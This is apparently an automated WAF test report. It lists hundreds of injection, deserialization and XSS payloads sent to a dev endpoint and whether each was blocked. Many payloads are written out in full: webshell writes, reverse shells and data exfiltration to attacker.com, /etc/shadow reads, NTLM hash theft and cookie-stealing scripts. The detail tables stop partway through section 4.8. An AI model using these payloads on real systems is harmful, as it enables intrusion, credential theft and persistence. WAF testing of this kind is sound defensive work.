Protection Capability Test Report

Report generated by jxwaf-test on 2026-05-30 13:34:45
Test PoC source: PayloadsAllTheThings


1. Test overview

| Metric | Value |
|---|---|
| WAF target URL | http://dev.jxwaf.com/account_init_check |
| Number of test categories | 36 |
| Total test items | 477 |
| Passed (blocked) | 461 |
| Failed (missed) | 16 |
| Request errors | 0 |
| Overall pass rate | 96.6% |
| Block criterion | HTTP [403] |

2. Test coverage categories

The attack types covered by this test and the parent category each belongs to:

| Category | Items | Parent category |
|---|---|---|
| sql injection | 24 | SQL injection |
| mysql injection | 17 | SQL injection |
| mssql injection | 19 | SQL injection |
| postgresql injection | 18 | SQL injection |
| oracle injection | 17 | Other |
| sqlite injection | 10 | SQL injection |
| xss | 22 | XSS |
| xss by context | 15 | XSS |
| command injection | 20 | Command injection |
| file inclusion | 11 | Other |
| directory traversal | 12 | Other |
| ssti | 18 | Server-side injection |
| xxe | 14 | XXE |
| ssi injection | 12 | Server-side injection |
| xpath injection | 13 | Other injection |
| prototype pollution | 12 | Prototype pollution |
| xslt injection | 12 | Server-side injection |
| graphql injection | 12 | Other injection |
| java php dotnet deserialization | 7 | Deserialization |
| java deserialization | 11 | Deserialization |
| php deserialization | 6 | Deserialization |
| python deserialization | 7 | Deserialization |
| dotnet deserialization | 4 | Deserialization |
| nodejs deserialization | 6 | Deserialization |
| ruby deserialization | 3 | Deserialization |
| file upload | 16 | File upload |
| waf bypass sqli | 20 | SQL injection, WAF bypass |
| waf bypass sqli db | 16 | SQL injection, WAF bypass |
| waf bypass xss | 19 | XSS, WAF bypass |
| waf bypass command | 18 | Command injection, WAF bypass |
| waf bypass path | 11 | WAF bypass |
| waf bypass lfi | 9 | File inclusion, WAF bypass |
| waf bypass xxe | 11 | XXE, WAF bypass |
| waf bypass upload | 15 | File upload, WAF bypass |
| waf bypass general | 10 | WAF bypass |
| latex injection | 10 | Other injection |

3. Pass rate summary by category

| Category | Items | Passed | Failed | Errors | Pass rate |
|---|---|---|---|---|---|
| sql injection | 24 | 24 | 0 | 0 | ████████████████████ 100.0% |
| mysql injection | 17 | 17 | 0 | 0 | ████████████████████ 100.0% |
| mssql injection | 19 | 19 | 0 | 0 | ████████████████████ 100.0% |
| postgresql injection | 18 | 18 | 0 | 0 | ████████████████████ 100.0% |
| oracle injection | 17 | 17 | 0 | 0 | ████████████████████ 100.0% |
| sqlite injection | 10 | 10 | 0 | 0 | ████████████████████ 100.0% |
| xss | 22 | 22 | 0 | 0 | ████████████████████ 100.0% |
| xss by context | 15 | 15 | 0 | 0 | ████████████████████ 100.0% |
| command injection | 20 | 19 | 1 | 0 | ███████████████████░ 95.0% |
| file inclusion | 11 | 11 | 0 | 0 | ████████████████████ 100.0% |
| directory traversal | 12 | 12 | 0 | 0 | ████████████████████ 100.0% |
| ssti | 18 | 18 | 0 | 0 | ████████████████████ 100.0% |
| xxe | 14 | 14 | 0 | 0 | ████████████████████ 100.0% |
| ssi injection | 12 | 12 | 0 | 0 | ████████████████████ 100.0% |
| xpath injection | 13 | 13 | 0 | 0 | ████████████████████ 100.0% |
| prototype pollution | 12 | 10 | 2 | 0 | ████████████████░░░░ 83.3% |
| xslt injection | 12 | 12 | 0 | 0 | ████████████████████ 100.0% |
| graphql injection | 12 | 1 | 11 | 0 | █░░░░░░░░░░░░░░░░░░░ 8.3% |
| java php dotnet deserialization | 7 | 7 | 0 | 0 | ████████████████████ 100.0% |
| java deserialization | 11 | 11 | 0 | 0 | ████████████████████ 100.0% |
| php deserialization | 6 | 6 | 0 | 0 | ████████████████████ 100.0% |
| python deserialization | 7 | 7 | 0 | 0 | ████████████████████ 100.0% |
| dotnet deserialization | 4 | 4 | 0 | 0 | ████████████████████ 100.0% |
| nodejs deserialization | 6 | 6 | 0 | 0 | ████████████████████ 100.0% |
| ruby deserialization | 3 | 3 | 0 | 0 | ████████████████████ 100.0% |
| file upload | 16 | 16 | 0 | 0 | ████████████████████ 100.0% |
| waf bypass sqli | 20 | 20 | 0 | 0 | ████████████████████ 100.0% |
| waf bypass sqli db | 16 | 16 | 0 | 0 | ████████████████████ 100.0% |
| waf bypass xss | 19 | 19 | 0 | 0 | ████████████████████ 100.0% |
| waf bypass command | 18 | 18 | 0 | 0 | ████████████████████ 100.0% |
| waf bypass path | 11 | 10 | 1 | 0 | ██████████████████░░ 90.9% |
| waf bypass lfi | 9 | 9 | 0 | 0 | ████████████████████ 100.0% |
| waf bypass xxe | 11 | 11 | 0 | 0 | ████████████████████ 100.0% |
| waf bypass upload | 15 | 15 | 0 | 0 | ████████████████████ 100.0% |
| waf bypass general | 10 | 10 | 0 | 0 | ████████████████████ 100.0% |
| latex injection | 10 | 9 | 1 | 0 | ██████████████████░░ 90.0% |

Overall pass rate: 461/477 = 96.6%


4. Test details by category

Status: 🛡️ passed | ⚠️ failed | ❌ error

4.1 sql injection

  • Items: 24 | Passed: 24 | Pass rate: 100.0%

| Status | Method | Item | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | SQL injection - error-based injection (leak data via error messages) | ' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND '1'='1 | 403 |
| 🛡️ | POST | SQL injection - UNION query injection (extract database version, username, table names) | ' UNION SELECT 1,version(),user(),database(),5-- - | 403 |
| 🛡️ | POST | SQL injection - time-based blind injection (5-second delay) | ' AND (SELECT SLEEP(5))-- | 403 |
| 🛡️ | POST | SQL injection - stacked queries (drop table) | '; DROP TABLE users-- | 403 |
| 🛡️ | POST | SQL injection - universal password login bypass | ' OR '1'='1'-- | 403 |
| 🛡️ | POST | SQL injection - boolean-based blind injection (guess admin password character by character) | ' AND SUBSTRING((SELECT password FROM users WHERE username='admin' LIMIT 1),1,1)='a'-- | 403 |
| 🛡️ | POST | SQL injection - read system file (/etc/passwd) | ' UNION SELECT LOAD_FILE('/etc/passwd'),2,3,4,5-- | 403 |
| 🛡️ | POST | SQL injection - write webshell into web directory | ' UNION SELECT 1,'<?php system($_GET["cmd"]);?>',3,4,5 INTO OUTFILE '/var/www/html/shell.php'-- | 403 |
| 🛡️ | POST | SQL injection - bypass space filtering (comments in place of spaces) | '/**/OR/**/1=1/**/-- | 403 |
| 🛡️ | POST | SQL injection - double-writing to bypass keyword filtering and extract data | ' UNIUNIONSELECTON SELECT user(),database(),version(),4,5-- | 403 |
| 🛡️ | POST | SQL injection - wide-byte injection to bypass escaping (GBK) | %df' OR 1=1-- | 403 |
| 🛡️ | POST | SQL injection - PostgreSQL COPY command writes file for RCE | '; COPY (SELECT '<?php system($_GET["cmd"]);?>') TO '/var/www/html/pg.php'-- | 403 |
| 🛡️ | POST | SQL injection - MSSQL xp_cmdshell executes system command | '; EXEC xp_cmdshell('whoami')-- | 403 |
| 🛡️ | POST | SQL injection - Oracle UTL_HTTP SSRF against internal network | ' UNION SELECT UTL_HTTP.REQUEST('http://169.254.169.254/latest/meta-data/') FROM dual-- | 403 |
| 🛡️ | POST | SQL injection - DNS out-of-band data exfiltration (MySQL load_file + DNS) | ' UNION SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users LIMIT 1),'.attacker.com\\a'))-- | 403 |
| 🛡️ | POST | SQL injection - scientific notation WAF bypass (equivalent to 1=1) | ' OR 1.e(1)=1.e(1)-- | 403 |
| 🛡️ | POST | SQL injection - hex encoding to bypass WAF keyword detection | ' UNION SELECT 0x61646d696e,2,3,4,5-- | 403 |
| 🛡️ | POST | SQL injection - inline comments to bypass WAF keyword detection and extract data | ' /*!UNION*/ /*!SELECT*/ user(),database(),version(),4,5-- | 403 |
| 🛡️ | POST | SQL injection - ORDER BY injection to extract table and column names | ' ORDER BY (SELECT 1 FROM information_schema.columns WHERE table_name='users' AND column_name='password')-- | 403 |
| 🛡️ | POST | SQL injection - percent-sign WAF bypass (MySQL # in place of the -- comment) | ' UNION SELECT 1,2,3,4 FROM dual WHERE 1=1 AND 2344=2344 AND '1q'='1q | 403 |
| 🛡️ | POST | SQL injection - GROUP BY injection to extract data | ' GROUP BY (SELECT password FROM users WHERE username='admin')-- | 403 |
| 🛡️ | POST | SQL injection - MySQL UDF shared library write for privilege escalation RCE | ' UNION SELECT 0x7F454C46...,2,3,4,5 INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so'-- | 403 |
| 🛡️ | POST | SQL injection - PostgreSQL large object write to file for RCE | '; SELECT lo_export(lo_create(99999),'/var/www/html/lo.php'); INSERT INTO pg_largeobject VALUES (99999,0,'<?php system($_GET[1]);?>')-- | 403 |
| 🛡️ | POST | SQL injection - MSSQL sp_OACreate file write to get a shell | '; DECLARE @o INT; EXEC sp_OACreate 'Scripting.FileSystemObject',@o OUT; EXEC sp_OAMethod @o,'CreateTextFile',NULL,'C:\inetpub\wwwroot\shell.asp'; EXE... | 403 |

4.2 mysql injection

  • Items: 17 | Passed: 17 | Pass rate: 100.0%

| Status | Method | Item | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | MySQL - UNION query steals all user password hashes | ' UNION SELECT 1,user,password,4,5 FROM mysql.user-- | 403 |
| 🛡️ | POST | MySQL - LOAD_FILE reads system password file | ' UNION SELECT LOAD_FILE('/etc/passwd'),2,3,4,5-- | 403 |
| 🛡️ | POST | MySQL - INTO OUTFILE writes webshell | ' UNION SELECT 1,'<?php system($_GET[1]);?>',3,4,5 INTO OUTFILE '/var/www/html/shell.php'-- | 403 |
| 🛡️ | POST | MySQL - SLEEP time-based blind injection obtains admin password (character by character) | ' AND IF(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a',SLEEP(5),0)-- | 403 |
| 🛡️ | POST | MySQL - INTO DUMPFILE writes binary file | ' UNION SELECT 0x3c3f7068702073797374656d28245f4745545b315d293b3f3e INTO DUMPFILE '/var/www/html/shell.php'-- | 403 |
| 🛡️ | POST | MySQL - BENCHMARK delay injection in place of SLEEP | ' AND IF(SUBSTRING(user(),1,1)='r',BENCHMARK(5000000,MD5('x')),0)-- | 403 |
| 🛡️ | POST | MySQL - updatexml error-based injection leaks data | ' AND updatexml(1,concat(0x7e,(SELECT password FROM users LIMIT 1),0x7e),1)-- | 403 |
| 🛡️ | POST | MySQL - extractvalue error-based injection leaks data | ' AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))-- | 403 |
| 🛡️ | POST | MySQL - NAME_CONST error-based injection | ' AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) AS x)-- | 403 |
| 🛡️ | POST | MySQL - double-query error-based injection (floor/rand) | ' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- | 403 |
| 🛡️ | POST | MySQL - multi-statement stacked query creates admin user | '; INSERT INTO users(username,password,role) VALUES('hacker','p@ss','admin')-- | 403 |
| 🛡️ | POST | MySQL - stacked query executes system command (sys_exec UDF) | '; SELECT sys_exec('bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"')-- | 403 |
| 🛡️ | POST | MySQL - DNS out-of-band data exfiltration (UNC path SMB NTLM hash theft) | ' UNION SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users LIMIT 1),'.attacker.com\\a'))-- | 403 |
| 🛡️ | POST | MySQL - DNS out-of-band data exfiltration (Windows) | ' UNION SELECT LOAD_FILE(CONCAT('\\\\attacker.com\\',(SELECT user())))-- | 403 |
| 🛡️ | POST | MySQL - extract table names without information_schema (sys.schema_auto_increment_columns) | ' UNION SELECT table_name FROM sys.schema_auto_increment_columns WHERE table_schema=database()-- | 403 |
| 🛡️ | POST | MySQL - extract data without column names (JOIN USING) | ' UNION SELECT * FROM (SELECT * FROM users AS a JOIN users AS b USING(id,username,password))x-- | 403 |
| 🛡️ | POST | MySQL - extract data without column names (equality comparison) | ' UNION SELECT 2 FROM (SELECT 1,2,3 UNION SELECT * FROM users)x LIMIT 1,1-- | 403 |

4.3 mssql injection

  • Items: 19 | Passed: 19 | Pass rate: 100.0%

| Status | Method | Item | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | MSSQL - xp_cmdshell reverse shell | '; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell 'powershell -c IEX(New-O... | 403 |
| 🛡️ | POST | MSSQL - xp_cmdshell reads system file | '; EXEC xp_cmdshell 'type C:\windows\system32\drivers\etc\hosts'-- | 403 |
| 🛡️ | POST | MSSQL - sp_OACreate executes command (when xp_cmdshell is disabled) | '; DECLARE @o INT; EXEC sp_OACreate 'WScript.Shell',@o OUT; EXEC sp_OAMethod @o,'Run',NULL,'cmd.exe /c whoami > C:\temp\out.txt'-- | 403 |
| 🛡️ | POST | MSSQL - xp_cmdshell writes webshell | '; EXEC xp_cmdshell 'echo ^<% Execute(Request("cmd")) %^> > C:\inetpub\wwwroot\shell.asp'-- | 403 |
| 🛡️ | POST | MSSQL - OpenRowset exfiltrates data to attacker server | '; INSERT INTO OPENROWSET('SQLOLEDB','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=attacker.com,80;','SELECT * FROM injected') SELECT name,password FRO... | 403 |
| 🛡️ | POST | MSSQL - sp_OACreate writes webshell | '; DECLARE @o INT; EXEC sp_OACreate 'Scripting.FileSystemObject',@o OUT; EXEC sp_OAMethod @o,'CreateTextFile',NULL,'C:\inetpub\wwwroot\shell.asp'; EXE... | 403 |
| 🛡️ | POST | MSSQL - xp_dirtree UNC path injection steals NTLM hash | '; EXEC master..xp_dirtree '\\attacker.com\share'-- | 403 |
| 🛡️ | POST | MSSQL - xp_subdirs UNC path injection steals NTLM hash | '; EXEC master..xp_subdirs '\\attacker.com\share'-- | 403 |
| 🛡️ | POST | MSSQL - xp_fileexist UNC path injection steals NTLM hash | '; EXEC master..xp_fileexist '\\attacker.com\share\test.txt'-- | 403 |
| 🛡️ | POST | MSSQL - trusted link lateral movement (Linked Server) | '; SELECT * FROM OPENQUERY(LINKED_SERVER,'SELECT @@version')-- | 403 |
| 🛡️ | POST | MSSQL - OPENROWSET union query + stacked system command execution | '; EXEC xp_cmdshell 'powershell -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAb... | 403 |
| 🛡️ | POST | MSSQL - trusted link command execution (Linked Server + xp_cmdshell) | '; EXEC ('EXEC xp_cmdshell ''whoami''') AT LINKED_SERVER-- | 403 |
| 🛡️ | POST | MSSQL - CLR assembly load executes command (high privilege) | '; CREATE ASSEMBLY SQLCLR FROM 0x4D5A... WITH PERMISSION_SET=UNSAFE; CREATE PROCEDURE CmdExec AS EXTERNAL NAME SQLCLR.StoredProcedures.CmdExec-- | 403 |
| 🛡️ | POST | MSSQL - error message leaks data (CONVERT/CAST) | ' AND 1=CONVERT(INT,(SELECT TOP 1 table_name FROM information_schema.tables))-- | 403 |
| 🛡️ | POST | MSSQL - OLE automation object writes file | '; DECLARE @o INT; EXEC sp_OACreate 'ADODB.Stream',@o OUT; EXEC sp_OASetProperty @o,'Type',2; EXEC sp_OAMethod @o,'Open'; EXEC sp_OAMethod @o,'WriteTe... | 403 |
| 🛡️ | POST | MSSQL - xp_regread reads password stored in registry | '; EXEC xp_regread N'HKEY_LOCAL_MACHINE',N'SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ValidCommunities'-- | 403 |
| 🛡️ | POST | MSSQL - xp_servicecontrol starts/stops service | '; EXEC xp_servicecontrol 'start','MSSQLSERVER'-- | 403 |
| 🛡️ | POST | MSSQL - query MSSQL version and database list | ' UNION SELECT @@version,DB_NAME(),3,4,5-- | 403 |
| 🛡️ | POST | MSSQL - WAITFOR DELAY time-based injection | '; IF (SELECT COUNT(*) FROM sys.sql_logins WHERE PWDCOMPARE('p@ss')=1)=1 WAITFOR DELAY '0:0:5'-- | 403 |

4.4 postgresql injection

  • Items: 18 | Passed: 18 | Pass rate: 100.0%

| Status | Method | Item | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | PostgreSQL - COPY command writes file for RCE | '; COPY (SELECT '<?php system($_GET[1]);?>') TO '/var/www/html/pg.php'-- | 403 |
| 🛡️ | POST | PostgreSQL - COPY FROM PROGRAM RCE | '; COPY (SELECT '') TO PROGRAM 'bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"'-- | 403 |
| 🛡️ | POST | PostgreSQL - large object lo_export writes webshell | '; SELECT lo_export(lo_create(99999),'/var/www/html/lo.php'); INSERT INTO pg_largeobject VALUES (99999,0,'<?php system($_GET[1]);?>')-- | 403 |
| 🛡️ | POST | PostgreSQL - pg_read_file reads system file | ' UNION SELECT pg_read_file('/etc/passwd'),2,3,4,5-- | 403 |
| 🛡️ | POST | PostgreSQL - pg_ls_dir lists directory | ' UNION SELECT pg_ls_dir('/var/www'),2,3,4,5-- | 403 |
| 🛡️ | POST | PostgreSQL - pg_read_file reads /etc/shadow | ' UNION SELECT pg_read_file('/etc/shadow',0,9999),2,3,4,5-- | 403 |
| 🛡️ | POST | PostgreSQL - time-based injection (pg_sleep) | ' AND (SELECT CASE WHEN (SELECT current_setting('is_superuser'))='on' THEN pg_sleep(5) ELSE pg_sleep(0) END)-- | 403 |
| 🛡️ | POST | PostgreSQL - CAST error-based injection leaks version | ' AND 1337=CAST((SELECT version()) AS INT)-- | 403 |
| 🛡️ | POST | PostgreSQL - CAST error-based injection leaks data | ' AND 1337=CAST((SELECT string_agg(table_name,',') FROM information_schema.tables WHERE table_schema=current_schema()) AS INT)-- | 403 |
| 🛡️ | POST | PostgreSQL - stacked query + COPY FROM PROGRAM reverse shell | '; COPY (SELECT '') TO PROGRAM 'perl -e "use Socket;$i=\"attacker.com\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockad... | 403 |
| 🛡️ | POST | PostgreSQL - DNS out-of-band data exfiltration | '; COPY (SELECT (SELECT password FROM users LIMIT 1)) TO PROGRAM 'nslookup $(cat).attacker.com'-- | 403 |
| 🛡️ | POST | PostgreSQL - stacked query creates superuser | '; CREATE USER hacker WITH SUPERUSER PASSWORD 'p@ss'-- | 403 |
| 🛡️ | POST | PostgreSQL - CREATE FUNCTION user-defined function executes command | '; CREATE OR REPLACE FUNCTION system(cmd text) RETURNS void AS $$ BEGIN EXECUTE cmd; END; $$ LANGUAGE plpgsql; SELECT system('cat /etc/shadow')-- | 403 |
| 🛡️ | POST | PostgreSQL - error-based injection (RAISE) | ' AND 1=(SELECT CASE WHEN (SELECT current_user)='postgres' THEN 1/0 ELSE 1 END)-- | 403 |
| 🛡️ | POST | PostgreSQL - type conversion error-based injection | ' AND (SELECT chr(126)\|\|current_database()\|\|chr(126)::NUMERIC)=1-- | 403 |
| 🛡️ | POST | PostgreSQL - quote-less bypass (CHR concatenation) | ' UNION SELECT table_name FROM information_schema.tables WHERE table_schema=CHR(112)\|\|CHR(117)\|\|CHR(98)\|\|CHR(108)\|\|CHR(105)\|\|CHR(99)-- | 403 |
| 🛡️ | POST | PostgreSQL - UNION extracts all user password hashes | ' UNION SELECT usename,passwd,3,4,5 FROM pg_shadow-- | 403 |
| 🛡️ | POST | PostgreSQL - dblink extension lateral movement | '; SELECT * FROM dblink('host=10.0.0.1 user=postgres password=secret','SELECT version()') AS t(ver TEXT)-- | 403 |

4.5 oracle injection

  • Items: 17 | Passed: 17 | Pass rate: 100.0%

| Status | Method | Item | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | Oracle - UNION data extraction (FROM dual required) | ' UNION SELECT NULL,NULL,username,password FROM all_users-- | 403 |
| 🛡️ | POST | Oracle - UNION extracts version and database name | ' UNION SELECT NULL,banner,NULL,NULL FROM v$version-- | 403 |
| 🛡️ | POST | Oracle - error-based injection (CTXSYS.DRITHSX.SN function) | ' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT password FROM sys.user$ WHERE name='SYS'))-- | 403 |
| 🛡️ | POST | Oracle - error-based injection (UTL_INADDR.get_host_name) | ' AND 1=UTL_INADDR.get_host_name((SELECT password FROM sys.user$ WHERE name='SYS'))-- | 403 |
| 🛡️ | POST | Oracle - error-based injection (DBMS_XDB_VERSION) | ' AND (SELECT DBMS_XDB_VERSION.makeversioned((SELECT password FROM sys.user$ WHERE name='SYS')) FROM dual) IS NOT NULL-- | 403 |
| 🛡️ | POST | Oracle - blind injection (SUBSTR + DECODE) | ' AND (SELECT DECODE(SUBSTR(password,1,1),'A',(SELECT COUNT(*) FROM all_tables)) FROM sys.user$ WHERE name='SYS') IS NOT NULL-- | 403 |
| 🛡️ | POST | Oracle - time-based injection (DBMS_PIPE.RECEIVE_MESSAGE) | ' AND (SELECT CASE WHEN (SELECT user FROM dual)='SYS' THEN DBMS_PIPE.RECEIVE_MESSAGE(('a'),5) ELSE NULL END FROM dual) IS NOT NULL-- | 403 |
| 🛡️ | POST | Oracle - time-based injection (DBMS_LOCK.SLEEP) | '; BEGIN DBMS_LOCK.SLEEP(5); END;-- | 403 |
| 🛡️ | POST | Oracle - OOB DNS data exfiltration (UTL_INADDR) | ' UNION SELECT UTL_INADDR.get_host_address((SELECT password FROM sys.user$ WHERE name='SYS')\|\|'.attacker.com') FROM dual-- | 403 |
| 🛡️ | POST | Oracle - OOB DNS data exfiltration (UTL_HTTP) | ' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'\|\|(SELECT password FROM sys.user$ WHERE name='SYS')) FROM dual-- | 403 |
| 🛡️ | POST | Oracle - stacked query changes admin password | '; UPDATE sys.user$ SET password='hacked' WHERE name='ADMIN'; COMMIT-- | 403 |
| 🛡️ | POST | Oracle - Java stored procedure command execution | '; DECLARE l_output DBMS_OUTPUT.CHARARR; l_lines INTEGER:=1000; BEGIN DBMS_JAVA.SET_OUTPUT(1000); DBMS_JAVA.GRANT_PERMISSION('SYS','java.io.FilePermis... | 403 |
| 🛡️ | POST | Oracle - DBMS_XMLQUERY command execution | '; SELECT DBMS_XMLQUERY.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace function xx return varchar2 is ... | 403 |
| 🛡️ | POST | Oracle - file read (BFILENAME) | ' UNION SELECT BFILENAME('DIR_NAME','filename'),NULL FROM dual-- | 403 |
| 🛡️ | POST | Oracle - extract database links (lateral movement) | ' UNION SELECT db_link,username,password,NULL,NULL FROM user_db_links-- | 403 |
| 🛡️ | POST | Oracle - Scheduler job command execution | '; BEGIN DBMS_SCHEDULER.create_job(job_name=>'JOB',job_type=>'EXECUTABLE',job_action=>'/bin/bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"',enab... | 403 |
| 🛡️ | POST | Oracle - UTL_FILE writes webshell | '; DECLARE f UTL_FILE.FILE_TYPE; BEGIN f:=UTL_FILE.FOPEN('WWWROOT','shell.jsp','w'); UTL_FILE.PUT_LINE(f,'<% Runtime.getRuntime().exec(request.getPara... | 403 |

4.6 sqlite injection

  • Items: 10 | Passed: 10 | Pass rate: 100.0%

| Status | Method | Item | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | SQLite - extract all table names | ' UNION SELECT 1,group_concat(name),3 FROM sqlite_master WHERE type='table'-- | 403 |
| 🛡️ | POST | SQLite - extract table structure (DDL) | ' UNION SELECT 1,sql,3 FROM sqlite_master WHERE type='table' AND name='users'-- | 403 |
| 🛡️ | POST | SQLite - extract all user data | ' UNION SELECT 1,group_concat(username\|\|':'\|\|password),3 FROM users-- | 403 |
| 🛡️ | POST | SQLite - write file (ATTACH DATABASE) | '; ATTACH DATABASE '/var/www/html/shell.php' AS shell; CREATE TABLE shell.pwn (dataz TEXT); INSERT INTO shell.pwn VALUES ('<?php system($_GET[1]);?>')... | 403 |
| 🛡️ | POST | SQLite - read file (readfile) | ' UNION SELECT 1,readfile('/etc/passwd'),3-- | 403 |
| 🛡️ | POST | SQLite - create malicious function via load_extension | '; SELECT load_extension('/tmp/evil.so')-- | 403 |
| 🛡️ | POST | SQLite - error-based injection (RAISE) | ' AND (SELECT CASE WHEN (SELECT sql FROM sqlite_master LIMIT 1) LIKE '%password%' THEN RAISE(ABORT,'LEAK') ELSE 1 END)-- | 403 |
| 🛡️ | POST | SQLite - write crontab scheduled task | '; ATTACH DATABASE '/var/spool/cron/crontabs/root' AS c; CREATE TABLE c.t (data TEXT); INSERT INTO c.t VALUES ('* * * * * bash -i >& /dev/tcp/attacker... | 403 |
| 🛡️ | POST | SQLite - overwrite .bashrc for persistence | '; ATTACH DATABASE '/root/.bashrc' AS brc; CREATE TABLE brc.x (d TEXT); INSERT INTO brc.x VALUES ('/tmp/backdoor&'); DETACH DATABASE brc-- | 403 |
| 🛡️ | POST | SQLite - injection reads sensitive data from the WAL log | ' UNION SELECT 1,hex(readfile('/var/www/html/db.sqlite-wal')),3-- | 403 |

4.7 xss

  • Items: 22 | Passed: 22 | Pass rate: 100.0%

| Status | Method | Item | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | XSS - keylogger exfiltrating to attacker server | <script>document.onkeypress=function(e){new Image().src='http://attacker.com/k?k='+e.key}</script> | 403 |
| 🛡️ | POST | XSS - cookie theft exfiltrating to attacker server | <script>new Image().src='http://attacker.com/steal?c='+document.cookie</script> | 403 |
| 🛡️ | POST | XSS - page content hijack (fake login phishing page) | <script>document.body.innerHTML='<h1>Session Expired</h1><form action=http://attacker.com/steal method=post><input name=user><input name=pass type=pas... | 403 |
| 🛡️ | POST | XSS - SVG onload cookie theft | <svg/onload=fetch('http://attacker.com/'+document.cookie)> | 403 |
| 🛡️ | POST | XSS - img onerror cookie theft (base64 encoding to bypass WAF) | <img src=x onerror=eval(atob('ZmV0Y2goJ2h0dHA6Ly9hdHRhY2tlci5jb20vJytkb2N1bWVudC5jb29raWUp'))> | 403 |
| 🛡️ | POST | XSS - full-screen iframe loading remote phishing page | <iframe src="http://attacker.com/phish" width=100% height=100%> | 403 |
| 🛡️ | POST | XSS - DOM injection loading remote malicious script | "><script>document.write('<script src=http://attacker.com/evil.js><\/script>')</script> | 403 |
| 🛡️ | POST | XSS - mixed-case bypass of script filter (cookie theft) | <ScRiPt>new Image().src='http://attacker.com/c?'+document.cookie</sCrIpT> | 403 |
| 🛡️ | POST | XSS - body onload redirect to phishing page | <body onload=document.location='http://attacker.com/phish'> | 403 |
| 🛡️ | POST | XSS - CSS injection steals CSRF token and sensitive data | <style>@import url('http://attacker.com/steal?d='+document.cookie+'&t='+document.querySelector('[name=csrf]').value)</style> | 403 |
| 🛡️ | POST | XSS - mXSS mutation XSS (innerHTML mutation bypasses sanitizer) | <listing><img src=1 onerror=alert(1)></listing> | 403 |
| 🛡️ | POST | XSS - JSONP endpoint hijack + CSP bypass | <script src="http://victim.com/jsonp?callback=fetch('http://attacker.com/'+document.cookie)"></script> | 403 |
| 🛡️ | POST | XSS - SVG foreignObject embedded HTML steals data | <svg xmlns="http://www.w3.org/2000/svg"><foreignObject width="100%" height="100%"><body xmlns="http://www.w3.org/1999/xhtml"><script>new Image().src='... | 403 |
| 🛡️ | POST | XSS - Service Worker registration for persistent hijack | <script>navigator.serviceWorker.register('http://attacker.com/sw.js')</script> | 403 |
| 🛡️ | POST | XSS - CSS keylogger (attribute selectors steal input character by character) | <style>input[type=password][value^="a"]{background:url(http://attacker.com/a)}input[type=password][value^="b"]{background:url(http://attacker.com/b)}<... | 403 |
| 🛡️ | POST | XSS - postMessage cross-window data theft | <script>window.addEventListener('message',function(e){new Image().src='http://attacker.com/'+e.data})</script> | 403 |
| 🛡️ | POST | XSS - window.name cross-origin transfer data theft (XSS sandbox escape) | <script>eval('window.name="<script>fetch(http://attacker.com/+document.cookie)<\/script>"')</script> | 403 |
| 🛡️ | POST | XSS - data:text/html iframe CSP bypass | <iframe src="data:text/html,<script>new Image().src='http://attacker.com/'+parent.document.cookie</script>"> | 403 |
| 🛡️ | POST | XSS - AngularJS sandbox escape (1.0-1.5) | {{constructor.constructor('new Image().src="http://attacker.com/"+document.cookie')()}} | 403 |
| 🛡️ | POST | XSS - DOM Clobbering hijacks global variable for XSS | <form id=x><output id=y>you</output></form><form name=x><input name=parentNode></form><script>alert(x.y.value)</script> | 403 |
| 🛡️ | POST | XSS - script tag splitting bypass (string concatenation) | <script>eval("new"+' Image().src="http://attacker.com/"+docu'+'ment.cookie')</script> | 403 |
| 🛡️ | POST | XSS - HTML5 new tag onfocus cookie theft | <details open ontoggle=new Image().src='http://attacker.com/'+document.cookie> | 403 |

4.8 xss by context

  • Items: 15 | Passed: 15 | Pass rate: 100.0%

| Status | Method | Item | Payload | HTTP status |
|---|---|---|---|---|
| 🛡️ | POST | XSS HTML context - script injection loading remote JS | <script src="http://attacker.com/beef.js"></script> | 403 |
| 🛡️ | POST | XSS attribute context - onerror event triggers remote JS | " onerror="fetch('http://attacker.com/'+document.cookie)" x=" | 403 |
| 🛡️ | POST | XSS JavaScript context - close script tag and inject | </script><script>fetch('http://attacker.com/'+document.cookie)</script> | 403 |
| 🛡️ | POST | XSS HREF context - javascript: pseudo-protocol + remote JS | <a href="javascript:fetch('http://attacker.com/'+document.cookie)">click</a> | 403 |
| 🛡️ | POST | XSS SVG context - inline script | <svg xmlns="http://www.w3.org/2000/svg"><script>fetch('http://attacker.com/'+document.cookie)</script></svg> | 403 |
| 🛡️ | POST | XSS CSS context - @import out-of-band data | </style><body onload=fetch('http://attacker.com/'+document.cookie)> | 403 |
| 🛡️ | POST | XSS Markdown render - markdown link + onerror | [click](javascript:fetch('http://attacker.com/'+document.cookie)) | 403 |
